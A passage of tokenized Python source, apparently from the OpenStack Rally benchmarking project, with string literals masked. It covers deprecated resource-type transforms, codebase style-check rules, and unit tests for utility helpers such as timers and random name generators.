) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if not resource_id : <EOL> glanceclient = clients . glance ( ) <EOL> resource_id = _id_from_name ( resource_config = resource_config , <EOL> resources = list ( <EOL> glanceclient . images . list ( ) ) , <EOL> typename = "<STR_LIT:image>" ) <EOL> return resource_id <EOL> class EC2ImageResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT:name>" not in resource_config and "<STR_LIT>" not in resource_config : <EOL> glanceclient = clients . 
glance ( ) <EOL> resource_name = _name_from_id ( resource_config = resource_config , <EOL> resources = list ( <EOL> glanceclient . images . list ( ) ) , <EOL> typename = "<STR_LIT:image>" ) <EOL> resource_config [ "<STR_LIT:name>" ] = resource_name <EOL> ec2client = clients . ec2 ( ) <EOL> resource_ec2_id = _id_from_name ( resource_config = resource_config , <EOL> resources = list ( <EOL> ec2client . get_all_images ( ) ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_ec2_id <EOL> class VolumeTypeResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if not resource_id : <EOL> cinderclient = clients . cinder ( ) <EOL> resource_id = _id_from_name ( resource_config = resource_config , <EOL> resources = cinderclient . <EOL> volume_types . list ( ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_id <EOL> class NeutronNetworkResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if resource_id : <EOL> return resource_id <EOL> else : <EOL> neutronclient = clients . neutron ( ) <EOL> for net in neutronclient . list_networks ( ) [ "<STR_LIT>" ] : <EOL> if net [ "<STR_LIT:name>" ] == resource_config . get ( "<STR_LIT:name>" ) : <EOL> return net [ "<STR_LIT:id>" ] <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> name = resource_config . get ( "<STR_LIT:name>" ) ) ) <EOL> class FilePathOrUrlType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . expanduser ( resource_config ) <EOL> if os . path . 
isfile ( path ) : <EOL> return path <EOL> try : <EOL> head = requests . head ( path ) <EOL> if head . status_code == <NUM_LIT:200> : <EOL> return path <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" % ( path , head . status_code ) ) <EOL> except Exception as ex : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" % ( path , ex ) ) <EOL> class FileType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> with open ( os . path . expanduser ( resource_config ) , "<STR_LIT:r>" ) as f : <EOL> return f . read ( ) <EOL> class FileTypeDict ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> file_type_dict = { } <EOL> for file_path in resource_config : <EOL> file_path = os . path . expanduser ( file_path ) <EOL> with open ( file_path , "<STR_LIT:r>" ) as f : <EOL> file_type_dict [ file_path ] = f . read ( ) <EOL> return file_type_dict </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import re <EOL> import tokenize <EOL> re_assert_true_instance = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_type = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_end_with_none = re . compile ( r"<STR_LIT>" ) <EOL> re_assert_equal_start_with_none = re . compile ( r"<STR_LIT>" ) <EOL> re_assert_true_false_with_in_or_not_in = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_true_false_with_in_or_not_in_spaces = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_in_end_with_true_or_false = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_in_start_with_true_or_false = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_no_construct_dict = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_no_construct_list = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_str_format = re . compile ( r"""<STR_LIT>""" , re . X ) <EOL> re_raises = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_db_import = re . compile ( r"<STR_LIT>" ) <EOL> re_objects_import = re . compile ( r"<STR_LIT>" ) <EOL> re_old_type_class = re . compile ( r"<STR_LIT>" ) <EOL> re_datetime_alias = re . compile ( r"<STR_LIT>" ) <EOL> def skip_ignored_lines ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( logical_line , physical_line , filename ) : <EOL> line = physical_line . strip ( ) <EOL> if not line or line . startswith ( "<STR_LIT:#>" ) or line . endswith ( "<STR_LIT>" ) : <EOL> return <EOL> yield next ( func ( logical_line , physical_line , filename ) ) <EOL> return wrapper <EOL> def _parse_assert_mock_str ( line ) : <EOL> point = line . find ( "<STR_LIT>" ) <EOL> if point == - <NUM_LIT:1> : <EOL> point = line . find ( "<STR_LIT>" ) <EOL> if point != - <NUM_LIT:1> : <EOL> end_pos = line [ point : ] . 
find ( "<STR_LIT:(>" ) + point <EOL> return point , line [ point + <NUM_LIT:1> : end_pos ] , line [ : point ] <EOL> else : <EOL> return None , None , None <EOL> @ skip_ignored_lines <EOL> def check_assert_methods_from_mock ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> correct_names = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> ignored_files = [ "<STR_LIT>" ] <EOL> if filename . startswith ( "<STR_LIT>" ) and filename not in ignored_files : <EOL> pos , method_name , obj_name = _parse_assert_mock_str ( logical_line ) <EOL> if pos : <EOL> if method_name not in correct_names : <EOL> error_number = "<STR_LIT>" <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if method_name == "<STR_LIT>" : <EOL> error_number = "<STR_LIT>" <EOL> custom_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> obj_name ) <EOL> elif method_name == "<STR_LIT>" : <EOL> error_number = "<STR_LIT>" <EOL> custom_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( obj_name , obj_name ) ) <EOL> elif method_name == "<STR_LIT>" : <EOL> error_number = "<STR_LIT>" <EOL> custom_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % obj_name ) <EOL> else : <EOL> custom_msg = ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( correct_names ) ) <EOL> yield ( pos , msg % { <EOL> "<STR_LIT>" : error_number , <EOL> "<STR_LIT>" : method_name , <EOL> "<STR_LIT>" : custom_msg } ) <EOL> @ skip_ignored_lines <EOL> def check_import_of_logging ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> excluded_files = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> forbidden_imports = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> if filename not in excluded_files : <EOL> for forbidden_import in forbidden_imports : <EOL> if logical_line . 
startswith ( forbidden_import ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def no_translate_debug_logs ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if logical_line . startswith ( "<STR_LIT>" ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def no_use_conf_debug_check ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> excluded_files = [ "<STR_LIT>" ] <EOL> point = logical_line . find ( "<STR_LIT>" ) <EOL> if point != - <NUM_LIT:1> and filename not in excluded_files : <EOL> yield ( point , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_true_instance ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_assert_true_instance . match ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_equal_type ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_assert_equal_type . match ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_equal_none ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> res = ( re_assert_equal_start_with_none . search ( logical_line ) or <EOL> re_assert_equal_end_with_none . search ( logical_line ) ) <EOL> if res : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_true_or_false_with_in ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> res = ( re_assert_true_false_with_in_or_not_in . search ( logical_line ) or <EOL> re_assert_true_false_with_in_or_not_in_spaces . 
search ( logical_line ) ) <EOL> if res : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_equal_in ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> res = ( re_assert_equal_in_end_with_true_or_false . search ( logical_line ) or <EOL> re_assert_equal_in_start_with_true_or_false . search ( logical_line ) ) <EOL> if res : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_no_direct_rally_objects_import ( logical_line , physical_line , <EOL> filename ) : <EOL> """<STR_LIT>""" <EOL> if filename == "<STR_LIT>" : <EOL> return <EOL> if filename == "<STR_LIT>" : <EOL> return <EOL> if ( logical_line . startswith ( "<STR_LIT>" ) <EOL> or logical_line . startswith ( "<STR_LIT>" ) ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_no_oslo_deprecated_import ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if ( logical_line . startswith ( "<STR_LIT>" ) <EOL> or logical_line . 
startswith ( "<STR_LIT>" ) ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_quotes ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> in_string = False <EOL> in_multiline_string = False <EOL> single_quotas_are_used = False <EOL> check_tripple = ( <EOL> lambda line , i , char : ( <EOL> i + <NUM_LIT:2> < len ( line ) and <EOL> ( char == line [ i ] == line [ i + <NUM_LIT:1> ] == line [ i + <NUM_LIT:2> ] ) <EOL> ) <EOL> ) <EOL> i = <NUM_LIT:0> <EOL> while i < len ( logical_line ) : <EOL> char = logical_line [ i ] <EOL> if in_string : <EOL> if char == "<STR_LIT>" : <EOL> in_string = False <EOL> if char == "<STR_LIT:\\>" : <EOL> i += <NUM_LIT:1> <EOL> elif in_multiline_string : <EOL> if check_tripple ( logical_line , i , "<STR_LIT>" ) : <EOL> i += <NUM_LIT:2> <EOL> in_multiline_string = False <EOL> elif char == "<STR_LIT:#>" : <EOL> break <EOL> elif char == "<STR_LIT:'>" : <EOL> single_quotas_are_used = True <EOL> break <EOL> elif char == "<STR_LIT>" : <EOL> if check_tripple ( logical_line , i , "<STR_LIT>" ) : <EOL> in_multiline_string = True <EOL> i += <NUM_LIT:3> <EOL> continue <EOL> in_string = True <EOL> i += <NUM_LIT:1> <EOL> if single_quotas_are_used : <EOL> yield ( i , "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_no_constructor_data_struct ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> match = re_no_construct_dict . search ( logical_line ) <EOL> if match : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> match = re_no_construct_list . search ( logical_line ) <EOL> if match : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> def check_dict_formatting_in_string ( logical_line , tokens ) : <EOL> """<STR_LIT>""" <EOL> if ( not logical_line or <EOL> logical_line . startswith ( "<STR_LIT:#>" ) or <EOL> logical_line . 
endswith ( "<STR_LIT>" ) ) : <EOL> return <EOL> current_string = "<STR_LIT>" <EOL> in_string = False <EOL> for token_type , text , start , end , line in tokens : <EOL> if token_type == tokenize . STRING : <EOL> if not in_string : <EOL> current_string = "<STR_LIT>" <EOL> in_string = True <EOL> current_string += text . strip ( "<STR_LIT>" ) <EOL> elif token_type == tokenize . OP : <EOL> if not current_string : <EOL> continue <EOL> in_string = False <EOL> if text == "<STR_LIT:%>" : <EOL> format_keys = set ( ) <EOL> for match in re_str_format . finditer ( current_string ) : <EOL> format_keys . add ( match . group ( <NUM_LIT:1> ) ) <EOL> if len ( format_keys ) == <NUM_LIT:1> : <EOL> yield ( <NUM_LIT:0> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if text != "<STR_LIT:)>" : <EOL> current_string = "<STR_LIT>" <EOL> elif token_type in ( tokenize . NL , tokenize . COMMENT ) : <EOL> continue <EOL> else : <EOL> in_string = False <EOL> if token_type == tokenize . NEWLINE : <EOL> current_string = "<STR_LIT>" <EOL> @ skip_ignored_lines <EOL> def check_using_unicode ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re . search ( r"<STR_LIT>" , logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def check_raises ( physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> ignored_files = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> if filename not in ignored_files : <EOL> if re_raises . search ( physical_line ) : <EOL> return ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_old_type_class ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_old_type_class . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_datetime_alias ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_datetime_alias . 
search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_db_imports_in_cli ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if ( not filename . startswith ( "<STR_LIT>" ) <EOL> or filename == "<STR_LIT>" ) : <EOL> return <EOL> if re_db_import . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_objects_imports_in_cli ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if ( not filename . startswith ( "<STR_LIT>" ) <EOL> or filename == "<STR_LIT>" ) : <EOL> return <EOL> if re_objects_import . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def factory ( register ) : <EOL> register ( check_assert_methods_from_mock ) <EOL> register ( check_import_of_logging ) <EOL> register ( no_translate_debug_logs ) <EOL> register ( no_use_conf_debug_check ) <EOL> register ( assert_true_instance ) <EOL> register ( assert_equal_type ) <EOL> register ( assert_equal_none ) <EOL> register ( assert_true_or_false_with_in ) <EOL> register ( assert_equal_in ) <EOL> register ( check_no_direct_rally_objects_import ) <EOL> register ( check_no_oslo_deprecated_import ) <EOL> register ( check_quotes ) <EOL> register ( check_no_constructor_data_struct ) <EOL> register ( check_dict_formatting_in_string ) <EOL> register ( check_using_unicode ) <EOL> register ( check_raises ) <EOL> register ( check_datetime_alias ) <EOL> register ( check_db_imports_in_cli ) <EOL> register ( check_objects_imports_in_cli ) <EOL> register ( check_old_type_class ) </s>
<s> from __future__ import print_function <EOL> import string <EOL> import sys <EOL> import threading <EOL> import time <EOL> import ddt <EOL> import mock <EOL> from six . moves import queue as Queue <EOL> import testtools <EOL> from rally . common import utils <EOL> from rally import exceptions <EOL> from tests . unit import test <EOL> class ImmutableMixinTestCase ( test . TestCase ) : <EOL> def test_without_base_values ( self ) : <EOL> im = utils . ImmutableMixin ( ) <EOL> self . assertRaises ( exceptions . ImmutableException , <EOL> im . __setattr__ , "<STR_LIT:test>" , "<STR_LIT:test>" ) <EOL> def test_with_base_values ( self ) : <EOL> class A ( utils . ImmutableMixin ) : <EOL> def __init__ ( self , test ) : <EOL> self . test = test <EOL> super ( A , self ) . __init__ ( ) <EOL> a = A ( "<STR_LIT:test>" ) <EOL> self . assertRaises ( exceptions . ImmutableException , <EOL> a . __setattr__ , "<STR_LIT:abc>" , "<STR_LIT:test>" ) <EOL> self . assertEqual ( a . test , "<STR_LIT:test>" ) <EOL> class EnumMixinTestCase ( test . TestCase ) : <EOL> def test_enum_mix_in ( self ) : <EOL> class Foo ( utils . EnumMixin ) : <EOL> a = <NUM_LIT:10> <EOL> b = <NUM_LIT:20> <EOL> CC = "<STR_LIT>" <EOL> self . assertEqual ( set ( list ( Foo ( ) ) ) , set ( [ <NUM_LIT:10> , <NUM_LIT:20> , "<STR_LIT>" ] ) ) <EOL> def test_with_underscore ( self ) : <EOL> class Foo ( utils . EnumMixin ) : <EOL> a = <NUM_LIT:10> <EOL> b = <NUM_LIT:20> <EOL> _CC = "<STR_LIT>" <EOL> self . assertEqual ( set ( list ( Foo ( ) ) ) , set ( [ <NUM_LIT:10> , <NUM_LIT:20> ] ) ) <EOL> class StdIOCaptureTestCase ( test . TestCase ) : <EOL> def test_stdout_capture ( self ) : <EOL> stdout = sys . stdout <EOL> messages = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> with utils . StdOutCapture ( ) as out : <EOL> for msg in messages : <EOL> print ( msg ) <EOL> self . assertEqual ( out . getvalue ( ) . rstrip ( "<STR_LIT:\n>" ) . split ( "<STR_LIT:\n>" ) , messages ) <EOL> self . assertEqual ( stdout , sys . 
stdout ) <EOL> def test_stderr_capture ( self ) : <EOL> stderr = sys . stderr <EOL> messages = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> with utils . StdErrCapture ( ) as err : <EOL> for msg in messages : <EOL> print ( msg , file = sys . stderr ) <EOL> self . assertEqual ( err . getvalue ( ) . rstrip ( "<STR_LIT:\n>" ) . split ( "<STR_LIT:\n>" ) , messages ) <EOL> self . assertEqual ( stderr , sys . stderr ) <EOL> class TimerTestCase ( test . TestCase ) : <EOL> def test_timer_duration ( self ) : <EOL> start_time = time . time ( ) <EOL> end_time = time . time ( ) <EOL> with mock . patch ( "<STR_LIT>" ) as mock_time : <EOL> mock_time . time = mock . MagicMock ( return_value = start_time ) <EOL> with utils . Timer ( ) as timer : <EOL> mock_time . time = mock . MagicMock ( return_value = end_time ) <EOL> self . assertIsNone ( timer . error ) <EOL> self . assertEqual ( end_time - start_time , timer . duration ( ) ) <EOL> def test_timer_exception ( self ) : <EOL> try : <EOL> with utils . Timer ( ) as timer : <EOL> raise Exception ( ) <EOL> except Exception : <EOL> pass <EOL> self . assertEqual ( <NUM_LIT:3> , len ( timer . error ) ) <EOL> self . assertEqual ( timer . error [ <NUM_LIT:0> ] , type ( Exception ( ) ) ) <EOL> def module_level_method ( ) : <EOL> pass <EOL> class MethodClassTestCase ( test . TestCase ) : <EOL> @ testtools . skipIf ( sys . version_info > ( <NUM_LIT:2> , <NUM_LIT:9> ) , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_method_class_for_class_level_method ( self ) : <EOL> class A ( object ) : <EOL> def m ( self ) : <EOL> pass <EOL> self . assertEqual ( A , utils . get_method_class ( A . m ) ) <EOL> def test_method_class_for_module_level_method ( self ) : <EOL> self . assertIsNone ( utils . get_method_class ( module_level_method ) ) <EOL> class FirstIndexTestCase ( test . TestCase ) : <EOL> def test_list_with_existing_matching_element ( self ) : <EOL> lst = [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] <EOL> self . assertEqual ( utils . 
first_index ( lst , lambda e : e == <NUM_LIT:1> ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( utils . first_index ( lst , lambda e : e == <NUM_LIT:5> ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( utils . first_index ( lst , lambda e : e == <NUM_LIT:7> ) , <NUM_LIT:3> ) <EOL> def test_list_with_non_existing_matching_element ( self ) : <EOL> lst = [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] <EOL> self . assertIsNone ( utils . first_index ( lst , lambda e : e == <NUM_LIT:2> ) ) <EOL> class EditDistanceTestCase ( test . TestCase ) : <EOL> def test_distance_empty_strings ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , dist ) <EOL> def test_distance_equal_strings ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , dist ) <EOL> def test_distance_replacement ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , dist ) <EOL> def test_distance_insertion ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , dist ) <EOL> def test_distance_deletion ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT:abc>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , dist ) <EOL> class TenantIteratorTestCase ( test . TestCase ) : <EOL> def test_iterate_per_tenant ( self ) : <EOL> users = [ ] <EOL> tenants_count = <NUM_LIT:2> <EOL> users_per_tenant = <NUM_LIT:5> <EOL> for tenant_id in range ( tenants_count ) : <EOL> for user_id in range ( users_per_tenant ) : <EOL> users . append ( { "<STR_LIT:id>" : str ( user_id ) , <EOL> "<STR_LIT>" : str ( tenant_id ) } ) <EOL> expected_result = [ <EOL> ( { "<STR_LIT:id>" : "<STR_LIT:0>" , "<STR_LIT>" : str ( i ) } , str ( i ) ) for i in range ( <EOL> tenants_count ) ] <EOL> real_result = [ i for i in utils . iterate_per_tenants ( users ) ] <EOL> self . 
assertEqual ( expected_result , real_result ) <EOL> class RAMIntTestCase ( test . TestCase ) : <EOL> def test__int__ ( self ) : <EOL> self . assertEqual ( <NUM_LIT:0> , int ( utils . RAMInt ( ) ) ) <EOL> self . assertEqual ( <NUM_LIT:10> , int ( utils . RAMInt ( <NUM_LIT:10> ) ) ) <EOL> def test__str__ ( self ) : <EOL> self . assertEqual ( "<STR_LIT:0>" , str ( utils . RAMInt ( ) ) ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( utils . RAMInt ( <NUM_LIT:20> ) ) ) <EOL> def test__next__ ( self ) : <EOL> ri = utils . RAMInt ( ) <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> self . assertEqual ( i , next ( ri ) ) <EOL> def test_next ( self ) : <EOL> ri = utils . RAMInt ( ) <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> self . assertEqual ( i , ri . next ( ) ) <EOL> def test_reset ( self ) : <EOL> ri = utils . RAMInt ( ) <EOL> ri . next ( ) <EOL> ri . reset ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , int ( ri ) ) <EOL> @ ddt . ddt <EOL> class RandomNameTestCase ( test . TestCase ) : <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> @ ddt . unpack <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_generate_random_name ( self , mock_choice , task_id = "<STR_LIT>" , <EOL> expected = "<STR_LIT>" , <EOL> fmt = "<STR_LIT>" ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = fmt <EOL> task = { "<STR_LIT>" : task_id } <EOL> generator = FakeNameGenerator ( ) <EOL> mock_choice . side_effect = iter ( "<STR_LIT>" ) <EOL> self . assertEqual ( generator . generate_random_name ( ) , expected ) <EOL> class FakeNameGenerator ( utils . 
RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = fmt <EOL> verification = { "<STR_LIT>" : task_id } <EOL> generator = FakeNameGenerator ( ) <EOL> mock_choice . side_effect = iter ( "<STR_LIT>" ) <EOL> self . assertEqual ( generator . generate_random_name ( ) , expected ) <EOL> def test_generate_random_name_bogus_name_format ( self ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> generator = FakeNameGenerator ( ) <EOL> self . assertRaises ( ValueError , <EOL> generator . generate_random_name ) <EOL> @ ddt . data ( <EOL> { "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:foo>" , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:foo>" , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) } ) <EOL> @ ddt . unpack <EOL> def test_cls_name_matches_object ( <EOL> self , good = ( ) , bad = ( ) , fmt = "<STR_LIT>" , <EOL> chars = string . ascii_letters + string . 
digits , task_id = None , <EOL> exact = True ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = fmt <EOL> RESOURCE_NAME_ALLOWED_CHARACTERS = chars <EOL> task = { "<STR_LIT>" : task_id or "<STR_LIT>" } <EOL> for name in good : <EOL> self . assertTrue ( <EOL> FakeNameGenerator . name_matches_object ( name , task_id , exact ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> { "<STR_LIT:name>" : name , "<STR_LIT>" : fmt , "<STR_LIT>" : exact } ) <EOL> for name in bad : <EOL> self . assertFalse ( <EOL> FakeNameGenerator . name_matches_object ( name , task_id , exact ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> { "<STR_LIT:name>" : name , "<STR_LIT>" : fmt , "<STR_LIT>" : exact } ) <EOL> def test_name_matches_object ( self ) : <EOL> name = "<STR_LIT:foo>" <EOL> obj = mock . Mock ( ) <EOL> self . assertTrue ( utils . name_matches_object ( name , obj ) ) <EOL> obj . name_matches_object . assert_called_once_with ( name ) <EOL> def test_name_matches_object_kwargs ( self ) : <EOL> name = "<STR_LIT:foo>" <EOL> obj = mock . Mock ( ) <EOL> self . assertTrue ( utils . name_matches_object ( name , obj , task_id = 